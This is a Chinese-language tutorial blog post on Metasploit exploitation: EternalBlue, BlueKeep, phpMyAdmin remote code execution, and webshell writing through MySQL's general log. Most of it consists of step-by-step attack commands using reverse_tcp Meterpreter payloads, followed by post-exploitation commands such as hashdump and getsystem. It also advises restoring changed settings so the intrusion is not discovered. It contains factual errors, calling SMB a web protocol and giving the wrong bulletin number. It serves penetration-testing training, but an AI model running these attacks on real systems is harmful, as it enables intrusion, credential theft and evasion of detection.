渗透利器-kali工具 (第五章-4) Metasploit漏洞利用模块一

本文内容:

  • 永恒之蓝
  • 实战漏洞利用
  • MSF会话常用命令

1,永恒之蓝:
  永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统可以执行任意代码。

  SMB:Web协议中的一种,就是Web客户端去访问服务器端的一种协议。

  使用MSF实现"永恒之蓝"的快速攻击,就是利用MSF中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。

2,实战漏洞利用:

  1.phpAdmin日志写shell:

    前提条件:用户是root

    思路:

      就是利用mysql的一个日志文件,这个日志文件每执行一个sql语句就会将其执行的语言保存。

      我们将这个日志文件重命名为shell.php 然后去执行一个sql语句,带有一句话木马的命令。

      然后再使用菜刀链接,就可以了。

    设置导出文件:

      general log    OFF--ON

      general log file   设置一个路径,执行sql语句,访问设置的路径即可。

    参考文章:

    注意:完成测试之后,需要将修改设置的地方,修改回来,以防被发现。

  2.MSF获取Get Shell:

    实战演示:phpMyAdmin

    1.查找模块:earch name:phpmyadmin / search CVE-2018-12611

    2.使用模块:use exploit/multi/http/phpmyadmin_lfi_rce

    3.查看设置选项:options [rhosts、targeturl、password]

    4.设置目标地址:set rhosts 127.0.0.1

    5.设置目标范围:set targetrul phpMyAdmin

    6.设置密码:set password root

    7.选择payload:set payload php/meterpreter/reverse_tcp

    8.查看设置选项:options [lhost]

    9.设置本机地址:set lhost 127.0.0.2

    10.开始攻击:run/exploit

  3.永恒之蓝:

    使用模块名:

      auxiliary/scanner/smb/smb_ms17_010

      exploit/windows/smb/ms17_010_eternalblue

    1.查找模块:search ms17

    2.使用模块:use auxiliary/scanner/smb/smb_ms17_010

    3.查看设置选项options[rhosts]

    4.设置目标地址:set rhosts 127.0.0.1

    5.扫描一下:exploit,出现一个绿色的+号,说明易受攻击

    6.使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

    7.查看设置选项:options [rhosts]

    8.设置目标地址:set rhosts 127.0.0.1

    9.设置payload:set payload windows/x64/meterpreter/reverse_tcp [64位的,因为靶机是64位的]

    10.查看设置选项:options [lhost]

    11.设置本地地址:set lhost 127.0.0.2

    12.开始攻击:run

    补充:

      有的时候,在扫描靶机的时候,不会出现绿色+号

      可以使用靶机和kali互相ping一下,看是否能ping通,如果ping不通

      可以查看两个机器的ip是否在同一网段,将他们设置为同一个网段,如果还不行,将靶机防火墙关闭,试试。

      蓝屏是计算机自动保护系统,存在一定几率出现蓝屏。

  4.MSF永恒之蓝[实现蓝屏]:

    Kali,MSF中没有这个:cve-2019-0708exploit

    需要自己安装:git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce

    需要自己配置;

      1. 第一步,配置rdp.rb: 存放rdp.rb到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录下

      2. 第二步,配置rdp_scanner.rb :存放rdp_scanner.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下

      3. 第三步,配置cve_2019_0708_bluekeep.rb:存放cve_2019_0708_bluekeep.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下

      4. 第四步,配置cve_2019_0708_bluekeep_rce.rb:存放cve_2019_0708_bluekeep_rce.rb到/usr/share/metasploit-framework/modules/exploits/windows/rdp ------这里可能没有rdp这个文件夹,如果没有自己创建一个,到这里配置就完成了。

      5.需要全部加载一下:reload_all [否则到时候可能读不到模块]

    实现步骤:

      1.使用辅助模块:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 

      2.设置目标地址:set rhosts 127.0.0.1

      3.检测一下:run 出现绿色 + 号,易受攻击

      4.使用攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

      5.设置目标地址:set rhosts   127.0.0.1

      6.设置端口:set rport 3389

      7.查看攻击方式:show targets

      8.我这里选择vmware 15 就是4 :set target 4

      9.开始攻击:run

  5.shell:

    了解shell:

      连接一般分为正向连接和反向链接:

        正向连接:对方服务器开放端口,让我们去访问:

          例如使用:telnet 127.0.0.1:80

        反向链接:我们开放端口,让对方反问:

          也就是让对方来找我们的端口,例如:反弹shell

    反弹shell:

      reverse shell,端口,被控端发起请求到该端口,并将其命令行的输入就是控制端监听在某TCP/UDP输出到控制端。

    为什么要反弹shell:

      1.某客户机中了你的网马,但是它在局域网内,你直接访问不了,它的IP会动态改变,你不能持续控制。

      2.由于防火墙等限制,对方机器只能发送请求,不能接受请求。

      3.对于病毒,木马受害者什么时候能中号,对方网络环境是什么样的,什么时候关机,都是未知,所以建立一个服务端,让而已程序主动连接,才是上策。

      4.反弹很好理解:攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

3,MSF会话常用命令:

  通过反弹shell获得会话常用命令:

  1.文件系统命令:

    edit           编辑文件

    getlwd         显示本地工作目录

    Dir          列出目标文件目录

    mkdir         创建目录

  2.网络、系统命令:

    ipconfig      显示网络接口信息

    netstat        显示网络连接信息

    execute       执行命令

    ps          列出正在运行的进程

    sysinfo        获取远程系统给的有关信息,例如os

  3.用户界面命令:

    getdesktop     获取当前的Meterpreter桌面

    screenshot     获取目标桌面屏幕截图

  4.提权、密码命令:

    getsystem     尝试将你的权限提升为本地系统的权限

    hashdump     获取目标NTLM-HASH值

      

    

原文地址:https://www.cnblogs.com/xz25/p/12918347.html